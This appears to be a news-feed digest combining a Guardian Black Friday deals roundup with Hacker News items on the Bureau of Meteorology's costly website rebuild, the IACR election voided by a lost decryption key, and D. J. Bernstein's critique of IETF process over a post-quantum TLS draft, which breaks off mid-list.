We don’t take retailers at their word on discount size, either. Amazon may say it’s “70%” off the RRP, but we study the price history of every item using independent tools such as the Camelizer to find out how generous a discount really is. If an item’s price has been all over the place in 2025, we’ll give the average price below instead of a “was …” price, so you can judge how good a deal it is.
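As a rough illustration of that kind of check (a minimal sketch, not the Filter’s or the Camelizer’s actual method; the price history and the 10% threshold below are invented for the example), comparing a sale price against the long-term average rather than the listed RRP might look like this:

# Minimal sketch: judge a deal against the item's average price, not the RRP.
# The price history and the 10% threshold are illustrative assumptions.
price_history = [31.99, 29.99, 33.49, 30.99, 31.42]   # hypothetical prices seen over the year
black_friday_price = 25.49

average_price = sum(price_history) / len(price_history)
saving_vs_average = (average_price - black_friday_price) / average_price

print(f"Average price: £{average_price:.2f}")
print(f"Saving vs average: {saving_vs_average:.0%}")

if saving_vs_average >= 0.10:
    print("Looks like a genuine discount.")
else:
    print("Probably not much better than its usual price.")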

Q&A

How is the Filter covering Black Friday?


At the Filter, we believe in buying sustainably, and the excessive consumerism encouraged by Black Friday doesn’t sit easily with us. However, we also believe in shopping smarter, and there’s no denying that it’s often the best time of year to buy big-ticket items that you genuinely need and have planned to buy in advance, or stock up on regular buys such as skincare and cleaning products.

Retailers often push offers that are not as good as they seem, with the intention of clearing out old stock, so we only recommend genuine deals. We assess the price history of every product where it’s available, and we won’t feature anything unless it is genuinely lower than its average price – and we will always specify this in our articles.

We only recommend deals on products that we’ve tested or have been recommended by product experts. What we choose to feature is based on the best products at the best prices chosen by our editorially independent team, free of commercial influence.


The best early Black Friday deals on the Filter’s favourite products


Best toys and games deals


Family board game that isn’t Monopoly

Azul tile laying game

Azul tile laying game, £25.49 (avg £31.42)

£25.49 at Amazon

The Filter team recommended this pattern-building game as an “addictive” Father’s Day gift “guaranteed to be a hit”, but it’s far too good to leave to just the dads. It’s mercifully quick to learn and suitable for tweens and up, so you and your Christmas visitors can have a bout underway faster than you can say “read the instructions”. This is the first time its price has dropped much below £30 since 2023.


Family card game

An open tin of the Dobble game with the cards around it

Dobble original, £6.99 (avg £9.16)

£6.99 at Amazon

Race to find the matching images in this popular observation game – one of our top tips for keeping kids entertained on long train journeys . You can mix things up with games-within-games such as “hot potato” and “catch them all”, and it’s versatile enough to suit any number of players from two to eight. This deal isn’t quite the 50% off that Amazon claims (its average price on the site is under £10), but this is its lowest price of 2025.


EA Sports FC 26

EA Sports FC 26 PS5 Game

EA Sports FC 26 for PS5, from £34.99 (was £69.99)

£34.99 at PlayStation Store
£37.99 at Amazon

EA’s FC 26 was released to great fanfare in September, and it’s proved to be one of Amazon’s best Black Friday sellers so far. As Ben Wilson explains in his four-star review , this versatile game is a sim offline and a whole other beast online, where it’s purely an esport with shots and goals prioritised over defending. Unusually, Amazon is beaten to the lowest price on this one – by the PlayStation store, no less.


The best tech deals


Silk sleep headphones

Best Sleep Aids. Snoozeband silk
Photograph: Jane Hoskyn/The Guardian

Snoozeband Silk, £84 (was £99)

£84 at Snoozeband

Block out the world and drift off to whatever music, podcast or white noise you choose with this comfy silk sleep mask that incorporates flat Bluetooth speakers for pairing with your phone. It impressed our writer Jane Hoskyn in her mission to find sleep aids that actually work, but she found it a little pricey – so this discount is very welcome, and makes the Snoozeband an even better Christmas gift idea.


Running watch with Spotify

Garmin Forerunner® 165 Music Turquoise/Aqua

Garmin Forerunner 165 Music smartwatch, £208.05 (was £289)

£208.05 at Amazon

One of our favourite fitness tech gadgets, Garmin’s GPS smartwatch can’t run a marathon for you, but it sure can help ease the pain with its pace-tracking tools, offline Spotify support and 19-hour battery life. Amazon outdoes its rivals with this early deal on the aqua green edition of the watch, now at its lowest price ever.


Professional DJ headphones

AiAiAi TMA-2 DJ headphones

AiAiAi Audio TMA-2 DJ headphones, £124.94 (was £159)

£124.94 at Amazon

Many headphones claim to be pro or DJ-level, but this modular set is a favourite with actual DJs. DJ and producer Sophie Lloyd told the Filter’s Kate Hutchinson that she loves the sound quality, size and durability of these phones, adding that their modular design means “you can buy a new lead or earpieces separately, which is essential when you’re using them all the time”. This Black Friday deal takes them to their lowest price of 2025.


Portable Bluetooth speaker

Bose SoundLink Flex Portable Bluetooth Speaker

Bose SoundLink Flex 2nd gen, £108.95 (was £149.95)

£108.95 at John Lewis
£108.95 at Amazon

This fab portable speaker boasts 12-hour battery life, durability and a range of swish colours, making it a must-have for university life and beyond. It’s a superb piece of kit for the price, with excellent sound quality, nine-metre Bluetooth connectivity and smart TV support.


The best home deals


Heated fleece throw

Silentnight Luxury Heated Throw

Silentnight luxury heated throw, from £36 (was £45)

£36 at Boots
£36.25 at Amazon

One of Amazon’s best sellers this Black Friday but 25p cheaper at Boots, Silentnight’s toasty fleece blanket was one of the lighter and thinner options in our best heated throws roundup. That makes this 120 x 160cm throw ideal for wrapping around yourself (and no-one else) on the sofa as the evenings grow ever colder.


Smart baby monitor

Owlet Dream Sock

Owlet Dream Sock, from £199 (was £299)

£199.99 at John Lewis
£199 at Amazon

Owlet’s feature-packed smartphone-compatible baby monitor was one of the favourite baby products when we spoke to parents last year. If you’d rather not give your £199 to Amazon, John Lewis is only 99p more.


The best combination steam cleaner

Vax Steam Fresh Combi Classic Steam Mop

Vax Steam Fresh Total Home mop, from £84 (was £160)

£84 at Amazon
£84.99 at Currys

Emerging from Stuart Andrews’ best steam cleaners test as the “best combination cleaner”, Vax’s versatile mop proved easy and effective to use on multiple surfaces and tight corners. The handheld bit detaches easily from the body then slots back in when needed, and you get an array of brushes, scrapers, pads and nozzles. This dirt-blitzing package has dropped more than 40% at Currys and Amazon.


Smart wake-up and reading light

Philips SmartSleep Sleep and Wake-Up Light

Philips SmartSleep sleep and wake-up light, £139.99 (avg £179.61)

£139.99 at Philips
£139.99 at Amazon

When testing products for his guide to the best sunrise alarm clocks , our writer Pete Wise was struck by how well this one worked as a reading light. “Even when a bright setting is selected, the light seems relatively mellow and restful,” wrote Pete, who also liked the range of alarm sounds and audio input option. He found it a little too expensive, however – and it’s still north of £100, but somewhat less so.


The best heated clothes airer

Dry:Soon Deluxe 3-Tier Heated Clothes Airer

Dry:Soon Deluxe heated airer, £159.99 (was £199.99)

£159.99 at Lakeland
£159.99 at Amazon

A heated airer dries your clothes fast enough to avoid the dreaded stink of slow-dried laundry, and without the cost or noise of a tumble dryer. Lakeland’s three-tier heated airer – the top performer in our heated airers test – has proved enduringly popular with the Filter’s readers, and is now at its lowest price ever. Lakeland has also dropped the price of the airer with cover to £195.98 for Black Friday.


The best hybrid mattress

Testing the Otty Original Hybrid mattress
Photograph: Jane Hoskyn/The Guardian

Otty Original Hybrid double, £627.75 with code THEFILTER7 (was £647.99)

£627.75 at Otty

The most comfortable and supportive foam-and-springs hybrid of all the mattresses we’ve tested, the Otty already came at an impressive price of £647.99 for a double, but the Filter’s exclusive code gives you a small but perfectly welcome additional 7% off for Black Friday. For a deeper dive into this cosy mattress, read our Otty Original Hybrid review (spoiler: it gets five stars). Otty is now bundling two of our favourite pillows (usually £69.99 each) in with each mattress order, too.


Simba Pro hybrid mattress

Simba Hybrid Pro Mattress

Simba Hybrid Pro king size, £948.27 (was £1,299)

£948.27 at Simba

Mattress “discounts” may seem to be a 24/7/365 thing, but UK watchdogs have given companies short shrift over money-off claims that aren’t all they seem. We’ve certainly noticed Simba playing by the rules lately, and its current 30%-off sale is the first we’ve seen in months. The excellent Simba Hybrid Pro , another of our best mattresses , is now hundreds of pounds cheaper in all sizes, from single (now £599.25) to super king (now £1,091.22).


Wool mattress topper

woolroom mattress topper

Woolroom Deluxe wool topper (double), from £148.74 (was £174.99)

£148.74 at Amazon
£165.74 at the Woolroom

The sustainably sourced wool in Woolroom’s bedding is a hypoallergenic temperature regulator, helping to keep you warm in winter and cool on hotter nights. The company’s deluxe mattress topper adds a touch of softness to a too-hard mattress, and is one of the easiest toppers we tested to move and store. Woolroom’s 35% discount isn’t quite as big as Amazon’s, but it applies to everything on its site, including duvets, mattresses and linens.


Powerful pressure washer

Bosch UniversalAquatak 36V-100 - 1 x 4.0 Ah battery | charger

Bosch UniversalAquatak 135 high pressure washer, £135 (was £209)

£135 at Currys
£135 at Amazon

Blitz the gunk from your patio, decking, gutters and any flat surface you find yourself unable to resist pointing the nozzle at. Our writer Andy Shaw found the UniversalAquatak to be the most powerful of all the pressure washers he tested, and he thought its price was reasonable too. It’s now even cheaper for Black Friday, although not quite its lowest price of 2025 – it was briefly (very briefly) under £120 for Prime Day.


Shark vacuum cleaner

Shark PowerDetect Clean & Empty Cordless Vacuum Cleaner

Shark PowerDetect vacuum, £314 (was £549)

£314 at Shark
£314 at Amazon

A vacuum cleaner that empties itself? Yes please, said our writer Andy Shaw in his roundup of the best cordless vacuum cleaners – and you agreed, making Shark’s ingenious and powerful cordless cleaner one of your favourite products of the year. Vacuums that look after themselves don’t come cheap, and it’s great to see this one heavily discounted at Shark’s own website as well as at Amazon.


The best robot vacuum cleaner

Eufy X10 Pro Omni robot vacuum

Eufy X10 Pro Omni, £499 (was £579)

£499 at Amazon
£499 at Argos

You wait a lifetime for a self-emptying vacuum cleaner, then Black Friday brings you two at once. The Eufy X10 was named “best overall” by Stuart Andrews in his guide to the best robot vacuums , and it’s already one of the fastest-selling items in Amazon’s Black Friday sale. Its price cut isn’t quite the 38% Amazon suggests, because it cost £579 throughout 2025, but this is still a legitimately good deal.


Damp-destroying dehumidifier

ProBreeze 20L Dehumidifier with Max Extraction and Laundry Mode

ProBreeze dehumidifier, from £151.99 (was £189.99)

£159.49 at ProBreeze

This “workhorse”, which “extracted moisture powerfully” in our best dehumidifiers test, has tumbled to its lowest price of the year (except for a few days in May, because no one buys dehumidifiers in May). If the recent cold snap gave you the condensation blues, here’s your chance to snap up the ProBreeze for a chunk below its average Amazon price of just over £180.


Cuddly heated throw

Beurer XXL HD 150 Nordic Taupe Heated snuggle blanket

Beurer HD150 heated throw, £79.99 (was £84.99)

£79.99 at Amazon

Beurer’s “soft and sumptuous” fleece blanket was crowned “best throw overall” in our guide to the best electric blankets thanks to its ability to get toasty fast without using much energy. A fiver off is not a massive discount, but this is its cheapest recent price on Amazon, where it normally costs £84.99 – and other retailers still want over £100 for it. We’ll bring you any non-Amazon deals that emerge in the coming days.


Google video doorbell

Google Nest doorbell

Google Nest doorbell, from £119.98 (was £179.99)

£119.98 at Amazon
£129 at Currys

Sort the cold-callers from the welcome visitors when they’re still metres away from your front door, with this outstanding battery-powered doorbell that crashes to its lowest price since Black Friday 2023. Andy Shaw named it the best video doorbell overall, but lamented that you also have to fork out for a Nest Aware subscription at £80 a year to save recordings.


Budget electric blanket

Slumberdown Sleepy Nights Electric Blanket Single

Slumberdown Sleepy Nights electric blanket, king size, from £30.59 (was £45.99)

£30.59 at Amazon
£34.20 at Slumberdown

This Slumberdown Sleepy Nights performed admirably in Emily Peck’s test of the best electric blankets, heating quickly to a comfortable temperature that kept our reviewer warm through the night. It also has elasticated fitted straps to make fitting easy, and comes in a variety of sizes to suit your bed. It’s the king-size one that’s been discounted.


Subscription-free video doorbell

Eufy Video Doorbell E340

Eufy Security doorbell E340, £74.99 (avg £151.29)

£74.99 at Amazon

Lots of video doorbells and home surveillance systems come with a recurring subscription to access some of their features, which you may wish to avoid. If so, the Eufy Video Doorbell E340 was Andy Shaw’s pick in his testing of the best video doorbells out there. He liked the E340 precisely because its dual-camera setup makes keeping an eye on parcels a breeze, while its onboard storage means you can skip cloud storage altogether. Reliability of movement detection needed some work, though. At £74.99 from Amazon, it’s also at its lowest price ever this Black Friday.


The best kitchen deals


Ninja assisted barista coffee machine

Ninja Luxe Café Premier Espresso Machine ES601UK

Ninja Cafe Luxe ES601UK, from £439 (was £549)

£439 at Amazon
£449.99 at Currys

Having cornered the market in air fryers, Ninja now has its eye on all your kitchen needs, starting with your morning coffee – however you take it, from cold brew to latte. The “sublime espresso”, “ingenious milk frother” and Barista Assist feature of the Ninja Luxe impressed our writer Sasha Muller enough to win it a place in the best espresso machines and best coffee machines , where Sasha noted that “you get a lot for your money” even at full price.


Great value kettle

Kenwood Ripple Kettle

Kenwood Ripple Kettle, from £27 (was £39.99)

£27 at Currys
£27 at John Lewis
£29 at Amazon

The best budget kettle in Rachel’s best kettles test, the handsome Kenwood looks more expensive than even its RRP suggests, and impresses with a wide pouring spout, single-cup boil and two water windows. Currys has the best Black Friday deal so far, with the white edition dropping to a bargain £27. At John Lewis it’s £28 for white or eggshell blue, while the Amazon deal is for midnight black.


Guinness draught pourer

Guinness Draught Nitrosurge Device

Guinness Nitrosurge device, £19.99 (was £30)

£19.99 at Amazon

This curious-looking device is a widget on steroids. It brings the nitro beer effect to your Guinness at home, enabling you to pour the black stuff in two-part draught style, just like any good bartender. It’s a brilliant Christmas gift idea, now with a third wiped off its price … so, sincere apologies if you bought it last week when we first recommended it. Note you’ll need to buy special Nitrosurge Guinness too, but that’s also in the Black Friday sale, at £16.50 for a pack of 10 one-pint cans.


Versatile espresso maker

De’Longhi Stilosa EC230.BK, Traditional Barista Pump espresso Machine

De’Longhi Stilosa espresso machine, £84.55 (was £89)

£84.55 at Amazon

The promise of “ludicrously tasty” espresso and “perfect microfoam for silky cappuccinos and flat whites” proved so irresistible that this was one of the Filter recommendations you loved most in 2025. Our writer Sasha Muller was already wowed by its affordability in his espresso machines test, and it’s rarely discounted at all, so we’re not too sad to see it drop just a few pounds for Black Friday.


Capsule coffee machine

Philips L’OR Barista Sublime Capsule Coffee Machine

Philips L’or Barista Sublime, from £45 (avg £69.40)

£45 at John Lewis
£47.99 at Amazon

The price of this sleek machine has bounced between £105 and about £60 since 2023, only ever dipping to £45 for Black Friday each year. Its compatibility, compactness and coffee impressed the Filter’s cuppa connoisseur, Sasha Muller, enough to be named “best capsule machine” in his bid to find the best coffee machines .


Ninja air fryer

Ninja Double Stack XL Air Fryer

Ninja Double Stack XL, £188 (was £269.99)

£188 at Ninja
£188 at Amazon

If you’re still holding out on buying an air fryer, here’s a rare chance to grab a big-name, big-capacity Ninja without the big price tag. Not quite so big, anyway. Rachel Ogden named the Double Stack XL “best compact air fryer” in her guide to the best air fryers, but with its 9.5L capacity and four cooking levels, this thing can cook a lot. Still not cheap, but far below its average price of £229.


The best blender

Braun PowerBlend 9 Jug blender JB 9040 Black

Braun PowerBlend 9, £140 (was £199)

£140 at Amazon
£140 at AO

You can spend about £500 on a premium blender, but this superb model from Braun costs below £200 even at full price – something our best blenders tester, Rachel Ogden, could hardly believe when she named it “best overall”. Hold on to your smoothie, Rachel, because it’s now less than £150, and not just at Amazon.


Tefal air fryer

Tefal Easy Fry Dual XXL EY942BG0

Tefal Easy Fry Dual XXL, from £119 (was £199.99)

£119 at Argos
£119.99 at Amazon

Tefal is known mostly for its ActiFry tech, so when Rachel Ogden crowned the Tefal Easy Fry Dual XXL as the best air fryer , it made sense. She found it to be a sublime all-rounder in her testing, handling both chips and frozen food very well. With an 11-litre capacity, it’s also Tefal’s largest dual zone air fryer, making it handy for cooking a lot of food for larger families when you need to.


The best kettle we’ve tested

Bosch Sky Kettle

Bosch Sky kettle, £64.99 (avg £85.38)

£64.99 at John Lewis
£64.99 at Amazon

Crowned overall winner in Rachel Ogden’s mission to find the best kettles, this Bosch beauty now comes at a price you can’t refuse – and not just from Amazon. “A brilliant blend of robust form and function” wrote Rachel of this fashionably industrial-looking kettle, whose features include a low minimum boil (300ml), keep-warm setting and touch controls. Now its lowest price ever, in white or black.


The best personal care appliance deals


Sunrise alarm clock

Lumie Sunrise Alarm Wake up to Daylight Table Lamp, White

Lumie Sunrise Alarm, from £29.99 (was £49)

£29.99 at Amazon
£37.49 at Boots

One of your favourite Filter recommendations of the year, this gentle sunrise alarm clock will wake you up with kittens purring, birdsong, gently brightening light – or a plain old alarm sound if you prefer. It’s been around for a few years and saw a price hike in 2022 (cost-of-waking-up crisis?) before settling at just under £50 from most retailers, so this is a deal worth grabbing.


Water flosser

Waterpik Ultra Professional Electric Water Flosser – White

Waterpik Ultra Professional, from £59.99 (was £91)

£59.99 at Amazon
£73 at Currys

Blast the gunk from your gums without having to grapple with floss. The Waterpik Ultra is a countertop model so it takes up more space than the cordless type, but this gives it more versatility and saw it score top marks with our water flosser tester Alan Martin. If you’d rather avoid Amazon, you can find it discounted by other retailers, albeit not by as much.


The best IPL device

Philips Lumea IPL 9900 Hair Removal Device

Philips Lumea 9900 BRI951/01, £377.99 (avg £501.33)

£377.99 at Amazon

IPL (intense pulsed light) hair remover devices promise to banish stubbly regrowth without the pain of waxing and epilation – at a price. The Philips Lumea 9900, Lise Smith’s pick for best IPL device overall, has cost as much as £599.99 for much of the year, and occasional discounts rarely go below £450. Amazon’s current price shaves more than £40 off any other Black Friday deal we’ve found for this version, which comes with four attachments.


The best beauty deals


A bargain beauty Advent calendar

W7 Beauty Blast Makeup Advent calendar 2025

W7 Beauty Blast Advent calendar, £16.95 (was £19.95)

£16.95 at Amazon

Advent calendars are a Christmas staple, and we’ve seen lots of brands try to put a different spin on them in the past – beauty Advent calendars are some of the most prominent. This W7 Beauty Blast calendar provides excellent value for money at a deal-busting £16.95 from Amazon, especially as it provides genuinely useful products for most folks. The eyeshadows, primers, lip balms and the like are travel-size, but apart from that, Sarah Matthews had little cause for complaint in her ranking of the best beauty Advent calendars.

Trade Chaos Causes Businesses to Rethink Their Relationship with the U.S.

Hacker News
www.nytimes.com
2025-11-24 12:47:38
Comments...
Original Article


Bureau of Meteorology asked to examine $96.5M bill for website redesign

Hacker News
www.abc.net.au
2025-11-24 12:35:15
Comments...
Original Article

The Bureau of Meteorology's (BOM) flawed and expensive redesigned website will come under renewed scrutiny, with the federal environment minister asking the agency's new boss to closely examine how it all went so wrong, and report back to him.

It comes amid revelations that the new website cost more than $96 million to design — a far cry from the $4 million figure it originally claimed had been spent.

The national weather agency was flooded with complaints by the public after the website was launched a month ago.

Users found it difficult to navigate, and also criticised the changes to the radar map , which made place names hard to read.

BOM users, farmers in particular, were critical of the changes made to the radar map. (ABC Rural: Justine Longmore)

Farmers were scathing, as they were unable to locate rainfall data.

The federal government was forced to intervene, ordering the agency to fix the website.

The site has since reverted to the old version of the radar map and other tweaks have been made to the site, with further changes to be rolled out.

In a statement provided to the ABC, the BOM admitted "the total cost of the website is approximately $96.5 million".

'Complete rebuild necessary'

It said the cost breakdown included $4.1 million for the redesign and $79.8 million for the website build, while the site's launch and security testing cost $12.6 million.
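(Those three line items do account for the headline figure: $4.1 million + $79.8 million + $12.6 million = $96.5 million.)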

"A complete rebuild was necessary to ensure the website meets modern security, usability and accessibility requirements for the millions of Australians who reply on it every day," a spokesperson said.

The spokesperson also said it had "continued to listen to and analyse community feedback" since the launch of the new website on October 22.

The BOM says it continues to listen to and analyse community feedback. (ABC News: Greg Bigelow)

Nine days after the launch it changed the radar map back to what it had previously been.

"This brought back the visual style that the community said they found intuitive and reliable for interpreting weather conditions,"

a spokesperson said.

"This option was already available on the new site but not as the default setting when visiting the page.

"On 7 November we implemented changes to help the community find important fire behaviour index information."

Future changes were also in the pipeline in response to community feedback, according to the spokesperson, but some updates had been paused due to Severe Tropical Cyclone Fina in northern Australia.

Minister's expectations 'have been made very clear'

Environment Minister Murray Watt said he had met twice in the past week with the new CEO Stuart Minchin to reiterate his concerns about the bungled process and the cost.

The environment minister says he has met twice with the BOM's new boss. (ABC News: Callum Flinn)

He has asked Mr Minchin to report back to him on the issue.

"I don't think it's secret that I haven't been happy with the way the BOM has handled the transition to the new website," he told reporters on Sunday.

"I met with him on his first day and during the week just gone, to outline again that I think the BOM hasn't met public expectations, both in terms of the performance of the website and the cost of the website.

"So I've asked him as his first priority to make sure that he can get on top of the issues with the website — the functionality — and I'm pleased to see they've made changes.

"But I've also asked him to get on top of how we got to this position with this cost, with the problems.

"He's only been in the job for a week but I think my expectations have been made very clear."

The minister has asked new BOM boss, Stuart Minchin, to prioritise the issues with the website. (Supplied: BOM)

However the minister stopped short of describing the website as a sheer waste of money, saying he would wait to hear back from Mr Minchin before commenting.

"Before leaping to judgement, I want to see what the new CEO of the BOM has been able to establish as to the reasons for those cost increases and I'll make my judgement at that point in time."

'Another Labor disaster'

Nationals leader David Littleproud said there should be "consequences" after the revelations about the true cost of the website.

"It is unbelievable a private consultancy was paid $78 million to redesign the website," Mr Littleproud said.

"But then security and system testing meant that Australian taxpayers actually paid $96 million for what was nothing more than another Labor disaster,.

"The seriousness of this cannot be understated. This isn't just about a clunky website, the changes actually put lives and safety at risk.

"The new platform did not allow people to enter GPS coordinates for their specific property locations, restricting searches to towns or postcodes.

"Families and farmers could not access vital, localised data such as river heights and rainfall information and this missing data created panic and fear across communities.

"But now, the fact the BOM has been hiding the true cost of its white elephant and initially lying about the total figure is deeply concerning, considering that the BOM should be all about trust."

Chrome Jpegxl Issue Reopened

Hacker News
issues.chromium.org
2025-11-24 12:23:02
Comments...

IACR Nullifies Election Because of Lost Decryption Key

Schneier
www.schneier.com
2025-11-24 12:03:46
The International Association of Cryptologic Research—the academic cryptography association that’s been putting conferences like Crypto (back when “crypto” meant “cryptography”) and Eurocrypt since the 1980s—had to nullify an online election when trustee Mot...
Original Article

The International Association of Cryptologic Research—the academic cryptography association that’s been putting conferences like Crypto (back when “crypto” meant “cryptography”) and Eurocrypt since the 1980s—had to nullify an online election when trustee Moti Yung lost his decryption key.

For this election and in accordance with the bylaws of the IACR, the three members of the IACR 2025 Election Committee acted as independent trustees, each holding a portion of the cryptographic key material required to jointly decrypt the results. This aspect of Helios’ design ensures that no two trustees could collude to determine the outcome of an election or the contents of individual votes on their own: all trustees must provide their decryption shares.

Unfortunately, one of the three trustees has irretrievably lost their private key, an honest but unfortunate human mistake, and therefore cannot compute their decryption share. As a result, Helios is unable to complete the decryption process, and it is technically impossible for us to obtain or verify the final outcome of this election.

The group will redo the election, but this time setting a 2-of-3 threshold scheme for decrypting the results, instead of requiring all three.
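For the cryptographically curious, here is a toy sketch of the kind of 2-of-3 threshold scheme being proposed (Shamir secret sharing over a prime field, written in Python purely for illustration; Helios' actual trustee mechanism and parameters differ): any two shares reconstruct the secret, so a single lost key no longer nullifies the count.

import random

P = 2**127 - 1  # a Mersenne prime modulus, chosen only for illustration

def make_shares(secret, n=3):
    # 2-of-3: evaluate the degree-1 polynomial f(x) = secret + a1*x (mod P) at x = 1..n
    a1 = random.randrange(P)
    return [(x, (secret + a1 * x) % P) for x in range(1, n + 1)]

def recover(two_shares):
    # Lagrange interpolation at x = 0 from any 2 shares
    total = 0
    for xi, yi in two_shares:
        num, den = 1, 1
        for xj, _ in two_shares:
            if xj != xi:
                num = (num * -xj) % P
                den = (den * (xi - xj)) % P
        total = (total + yi * num * pow(den, -1, P)) % P
    return total

secret = random.randrange(P)            # stands in for the trustee key material
shares = make_shares(secret)            # one share per trustee
assert recover(shares[:2]) == secret                 # trustees 1 and 2 suffice...
assert recover([shares[0], shares[2]]) == secret     # ...even if trustee 2's share is lost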

News articles.


NSA and IETF, part 3: Dodging the issues at hand

Hacker News
blog.cr.yp.to
2025-11-24 12:00:55
Comments...
Original Article

2025.11.23: NSA and IETF, part 3: Dodging the issues at hand. #pqcrypto #hybrids #nsa #ietf #dodging

Normal practice in deploying post-quantum cryptography is to deploy ECC+PQ. IETF's TLS working group is standardizing ECC+PQ. But IETF management is also non-consensually ramming a particular NSA-driven document through the IETF process, a "non-hybrid" document that adds just PQ as another TLS option.

Don't worry: we're standardizing cars with seatbelts. Also, recognizing generous funding from the National Morgue Association, we're going to standardize cars without seatbelts as another option, ignoring the safety objections. That's okay, right?

Last month I posted part 1 of this story. Today's part 2 highlighted the corruption. This blog post, part 3, highlights the dodging in a particular posting at the beginning of this month by an IETF "security area director". Part 4 will give an example of how dissent on this topic has been censored.

Consensus means whatever the people in power want to do. Recall from my previous blog post that "adoption" of a document is a preliminary step before an IETF "working group" works on, and decides whether to standardize, the document. In April 2025, the chairs of the IETF TLS WG called for "adoption" of this NSA-driven document. During the call period, 20 people expressed unequivocal support for adoption, 2 people expressed conditional support for adoption, and 7 people expressed unequivocal opposition to adoption. ( Details for verification. )

The chairs claimed that "we have consensus to adopt this draft". I promptly asked for explanation .

Before the chairs could even reply, an "area director" interrupted , claiming, inter alia, the following: "There is clearly consensus based on the 67 responses to the adoption call. ... The vast majority was in favour of adoption ... There were a few dissenting opinions".

After these lies by the "area director" were debunked , the chairs said that they had declared consensus "because there is clearly sufficient interest to work on this draft" specifically "enough people willing to review the draft".

I can understand not everybody being familiar with the specific definition of "consensus" that antitrust law requires standards-development organizations to follow. But it's astonishing to see chairs substituting a consensus-evaluation procedure that simply ignores objections.

Stonewalling. The chairs said I could escalate. IETF procedures say that an unresolved dispute can be brought "to the attention of the Area Director(s) for the area in which the Working Group is chartered", and then "The Area Director(s) shall attempt to resolve the dispute".

I filed a complaint with the "security area directors" in early June 2025 . One of them never replied. The other, the same one who had claimed that there was "clearly consensus", sent a series of excuses for not handling the complaint. For example, one excuse was that the PDF format "discourages participation".

Do IETF procedures say "The Area Director(s) shall attempt to resolve the dispute unless the dispute is documented in a PDF"? No.

I sent email two days later systematically addressing the excuses. The "area director" never replied.

It isn't clear under IETF procedures whether a non-reply allows an appeal. It is, however, clear that an appeal can't be filed after two months. I escalated to the "Internet Engineering Steering Group" (IESG) in August 2025 .

(These aren't even marginally independent groups. The "area directors" are the IESG members. IESG appoints the WG chairs.)

IESG didn't reply until October 2025. It rejected one of the "Area Director" excuses for having ignored my complaint, but endorsed another excuse. I promptly filed a revised complaint with the "area director", jumping through the hoops that IESG had set. There were then further runarounds .

The switch. Suddenly, on 1 November 2025, IESG publicly instructed the "area director" to address the following question: "Was rough consensus to adopt draft-connolly-tls-mlkem-key-agreement in the TLS Working Group appropriately called by the WG chairs?"

The "area director" posted his conclusion mere hours later: "I agree with the TLS WG Chairs that the Adoption Call result was that there was rough consensus to adopt the document".

Dodging procedural objections. Before looking at how the "area director" argued for this conclusion, I'd like to emphasize three things that the "area director" didn't do.

First, did the "area director" address my complaint about the chair action on this topic? No.

One reason this matters is that the law requires standards-development organizations to provide an "appeals process" . Structurally, the "area director" isn't quoting and answering the points in my complaint; the "area director" puts the entire burden on the reader to try to figure out what's supposedly answering what, and to realize that many points remain unanswered.

Second, did the "area director" address the chairs claiming that "we have consensus to adopt this draft"? Or the previous claim from the "area director" that there was "clearly consensus"? No. Instead IESG and this "area director" quietly shifted from "consensus" to "rough consensus". (Did you notice this shift when I quoted IESG's "rough consensus" instruction?)

One reason this matters is that "consensus" is another of the legal requirements for standards-development organizations. The law doesn't allow "rough consensus". Also, IETF claims that "decision-making requires achieving broad consensus" . "broad consensus" is even stronger than "consensus", since it's saying that there's consensus in a broad group .

Third, the way that my complaint had established the lack of consensus was, first, by reviewing the general definition of "consensus" (which I paraphrased from the definition in the law, omitting a citation only because the TLS chairs had threatened me with a list ban if I mentioned the law again), and then applying the components of that definition to the situation at hand. Did the area director follow this structure? Here's the definition of "consensus", or "rough consensus" if we're switching to that, and now let's apply that definition? No. Nobody reading this message from the "area director" can figure out what the "area director" believes these words mean.

Wow, look at that: "due process" is another of the legal requirements for standards-development organizations. Part of due process is simply making clear what procedures are being applied . Could it possibly be that the people writing the law were thinking through how standardization processes could be abused?

Numbers. Without further ado, let's look at what the "security area director" did write.

The IESG has requested that I evaluate the WG Adoption call results for ML-KEM Post-Quantum Key Agreement for TLS 1.3 (draft-connolly-tls-mlkem-key-agreement). Please see below.

As noted above, IESG had instructed the "area director" to answer the following question: "Was rough consensus to adopt draft-connolly-tls-mlkem-key-agreement in the TLS Working Group appropriately called by the WG chairs?"

Side note: Given that the "area director" posted all of the following on the same day that IESG instructed the "area director" to write this, presumably this was all written in advance and coordinated with the rest of IESG. I guess the real point of finally (on 1 November 2025) addressing the adoption decision (from 15 April 2025) was to try to provide cover for the "last call" a few days later (5 November 2025).

ExecSum


I agree with the TLS WG Chairs that the Adoption Call result was that there was rough consensus to adopt the document.

As noted above, the TLS WG chairs had claimed "consensus", and the "area director" had claimed that there was "clearly consensus". The "area director" is now quietly shifting to a weaker claim.

Timeline


April 1: Sean and Joe announce WG Adoption Call [ about 40 messages sent in the thread ]

"About 40"? What happened to the "area director" previously writing "There is clearly consensus based on the 67 responses to the adoption call"? And why is the number of messages supposed to matter in the first place?

April 15: Sean announces the Adoption Call passed. [ another 50 messages are sent in the thread ]

Messages after the specified adoption-call deadline can't justify the claim that "the Adoption Call result was that there was rough consensus to adopt the document". The adoption call failed to reach consensus.

April 18 to today: A chain of (attempted) Appeals by D. J. Bernstein to the AD(s), IESG and IAB, parts of which are still in process.

The fact that the ADs and IESG stonewalled in response to complaints doesn't mean that they were "attempted" complaints.

Outcome


30 people participated in the consensus call, 23 were in favour of adoption, 6 against and 1 ambivalent (names included at the bottom of this email).

These numbers are much closer to reality than the "area director" previously writing "There is clearly consensus based on the 67 responses to the adoption call. ... The vast majority was in favour of adoption ... There were a few dissenting opinions".

Also, given that the "area director" is continually making claims that aren't true (see examples below) and seems generally allergic to providing evidence (the text I'm quoting below has, amazingly, zero URLs), it's a relief to see the "area director" providing names to back up the claimed numbers here.

But somehow, even after being caught lying about the numbers before, the "area director" still can't resist shading the numbers a bit.

The actual numbers were 20 people unequivocally supporting adoption, 2 people conditionally supporting adoption, and 7 people unequivocally opposing adoption. Clearly 7 is close to 6, and 20+2 is close to 23, but, hmmm, not exactly. Let's check the details:

  • How does the "area director" end up with 6 negative votes rather than 7? By falsely listing Thomas Bellebaum as "ambivalent" and falsely attributing a "prefer not, but okay if we do" position to Bellebaum. In fact, Bellebaum had written "I agree with Stephen on this one and would not support adoption of non-hybrids." (This was in reply to Stephen Farrell, who had written "I'm opposed to adoption, at this time.")

